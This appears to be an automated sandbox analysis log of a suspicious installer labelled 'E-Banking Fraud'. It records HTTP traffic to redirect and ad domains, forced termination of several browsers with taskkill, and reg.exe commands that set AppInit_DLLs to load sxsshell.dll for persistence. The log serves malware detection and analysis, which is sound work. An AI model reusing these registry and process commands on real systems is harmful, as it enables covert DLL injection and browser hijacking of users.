Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: fgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-84.0.4147.135Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /welcome2.php HTTP/1.1Host: smashbrowser.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r.php?key=pvwarw3 HTTP/1.1Host: exturl.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redirect.php HTTP/1.1Host: getfiles.wikiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?format=jsonp&callback=getIP HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= HTTP/1.1Host: getfiles.wikiConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://getfiles.wiki/redirect.phpAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /js15_as.js HTTP/1.1Host: s10.histats.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offerszzzz.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offersss.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stats/0.php?4708787&@f16&@g1&@h1&@i1&@j1679430047893&@k0&@l1&@m&@n0&@ohttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php&@q0&@r0&@s0&@ten-US&@u1280&@b1:197652976&@b3:1679430048&@b4:js15_as.js&@b5:-420&@a-_0.2.1&@vhttps%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&@w HTTP/1.1Host: s4.histats.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1Host: e.dtscout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offerszzzz.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1Host: offersss.clickConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /pv/?_a=v&_h=getfiles.wiki&_ss=44fghon7au&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=63lw&_cb=_dtspv.c HTTP/1.1Host: t.dtscout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; oa=1; df=1679401250
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: getfiles.wikiConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: image/webp,image/apng,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: HstCfa4708787=1679430047893; HstCla4708787=1679430047893; HstCmu4708787=1679430047893; HstPn4708787=1; HstPt4708787=1; HstCnv4708787=1; HstCns4708787=1
Source: global trafficHTTP traffic detected: GET /service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=84.0.4147.135&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1&x=id%3Dpkedcjkdefgpdelpbcmbmeomcjbeemfm%26v%3D0.0.0.0%26installedby%3Dother%26uc HTTP/1.1Host: clients2.google.comConnection: keep-aliveX-Goog-Update-Interactivity: bgX-Goog-Update-AppId: nmmhkkegccagdldgiimedpiccmgmieda,pkedcjkdefgpdelpbcmbmeomcjbeemfmX-Goog-Update-Updater: chromecrx-84.0.4147.135Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stats/e.php?4708787&@Ab&@R40431&@w HTTP/1.1Host: s4.histats.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /e/?v=1a&pid=5200&site=1&l=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php%3Fgjhagdjfbdjk%3DMTAyLjEyOS4xNDMuNzg%3D&j=https%3A%2F%2Fgetfiles.wiki%2Fredirect.php HTTP/1.1Host: e.dtscout.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: m=1; oa=1; df=1679401250

E-Banking Fraud

barindex
Source: C:\Windows\System32\xcopy.exeCode function: _time64,srand,GetCommandLineA,strstr,strstr,strstr,strstr,strstr,strstr,strchr,strncpy_s,memset,WideCharToMultiByte,WideCharToMultiByte,GetFileAttributesA,FindResourceA,Sleep,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,rand,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,strstr,strstr,strstr,strstr,CreateFileA,WriteFile,CloseHandle,WinExec,exit, chrome.exe21_2_000007FEF9021110
Source: C:\Windows\System32\xcopy.exeCode function: _time64,srand,GetCommandLineA,strstr,strstr,strstr,strstr,strstr,strstr,strchr,strncpy_s,memset,WideCharToMultiByte,WideCharToMultiByte,GetFileAttributesA,FindResourceA,Sleep,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,rand,memset,CreateProcessA,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,strstr,strstr,strstr,strstr,CreateFileA,WriteFile,CloseHandle,WinExec,exit, chrome.exe21_2_000007FEF9021110
Source: $RDGU87D.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpFile created: C:\Windows\system32\is-T05I8.tmpJump to behavior
Source: C:\Windows\System32\xcopy.exeCode function: 21_2_000007FEF902111021_2_000007FEF9021110
Source: $RDGU87D.tmp.1.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: $RDGU87D.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-T05I8.tmp.4.drStatic PE information: Resource name: BACKUP type: Zip archive data, at least v2.0 to extract, compression method=store
Source: is-T05I8.tmp.4.drStatic PE information: Resource name: BACKUP type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
Source: is-T05I8.tmp.4.drStatic PE information: Resource name: BACKUP type: PE32 executable (console) Intel 80386, for MS Windows
Source: $RDGU87D.exe, 00000001.00000003.916564021.000000007ECD0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exe, 00000001.00000003.915507811.00000000022D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exe, 00000001.00000002.923172358.0000000000554000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exe, 00000001.00000000.914686878.00000000004C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exe, 00000003.00000002.935328347.00000000006A4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs $RDGU87D.exe
Source: $RDGU87D.exeBinary or memory string: OriginalFileName vs $RDGU87D.exe
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /f
Source: C:\Users\user\Desktop\$RDGU87D.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpMemory allocated: 77620000 page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpMemory allocated: 77740000 page execute and read and writeJump to behavior
Source: $RDGU87D.exeReversingLabs: Detection: 47%
Source: $RDGU87D.exeVirustotal: Detection: 60%
Source: C:\Users\user\Desktop\$RDGU87D.exeFile read: C:\Users\user\Desktop\$RDGU87D.exeJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\taskkill.exeConsole Write: ................................................d1K.......................".............c.................".............V.......B.........5.....Jump to behavior
Source: C:\Windows\System32\taskkill.exeConsole Write: ................l...............................d1K.......................K.............c.................K.............V.......B.........-.....Jump to behavior
Source: C:\Windows\System32\taskkill.exeConsole Write: ..*.............................................d1K.......................&.............d.................&.......*.....X.......B.........@.....Jump to behavior
Source: C:\Windows\System32\taskkill.exeConsole Write: ................0...............................d1K.......................N.............b.................N.............T.......B.........*.....Jump to behavior
Source: C:\Windows\System32\taskkill.exeConsole Write: ................@...............................d1K.......................C.............b.................C.............T.......B.........&.....Jump to behavior
Source: C:\Windows\System32\reg.exeConsole Write: ................0...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.......N.......(...............Jump to behavior
Source: C:\Windows\System32\reg.exeConsole Write: ................8...............T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........x.&.....N.......(...............Jump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\$RDGU87D.exe C:\Users\user\Desktop\$RDGU87D.exe
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe"
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess created: C:\Users\user\Desktop\$RDGU87D.exe "C:\Users\user\Desktop\$RDGU87D.exe" /SILENT
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENT
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM vivaldi.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" install
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /f
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /f
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://smashbrowser.com/welcome2.php
Source: unknownProcess created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\rY3YrAQjOUXa"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\uOB9DUdVCp9I"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1004,578352216204275106,4554941784064420504,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1440 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\17vsRA25JVNi"
Source: unknownProcess created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D"
Source: unknownProcess created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8"
Source: unknownProcess created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\Odx9a70VBK1g"
Source: unknownProcess created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\EqwqqQBb6Hr3"
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe "-180126430115798039051631232828-2691859771612897714135344637115556289411055654796"
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmp" /SL5="$202DC,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-U66TV.tmp\$RDGU87D.tmpProcess created: C:\Users\user\Desktop\$RDGU87D.exe "C:\Users\user\Desktop\$RDGU87D.exe" /SILENTJump to behavior
Source: C:\Users\user\Desktop\$RDGU87D.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp "C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmp" /SL5="$202E0,1078547,780800,C:\Users\user\Desktop\$RDGU87D.exe" /SILENTJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM msedge.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM chrome.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM vivaldi.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM opera.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\taskkill.exe "taskkill" /F /IM brave.exe /TJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\is-0L8M0.tmp\install.bat" installJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DAB6L.tmp\$RDGU87D.tmpProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized -- "https://smashbrowser.com/welcome2.phpJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "AppInit_DLLs" /t REG_SZ /d "C:\Windows\system32\sxsshell.dll" /fJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v "LoadAppInit_DLLs" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /E /I /Y "C:\Users\user\AppData\Local\WindowsApp\googledoc" "C:\Users\user\AppData\Local\Temp\uOB9DUdVCp9I"Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1004,578352216204275106,4554941784064420504,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --lang=en-US --service-sandbox-type=network --enable-audio-service-sandbox --mojo-platform-channel-handle=1440 /prefetch:8Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
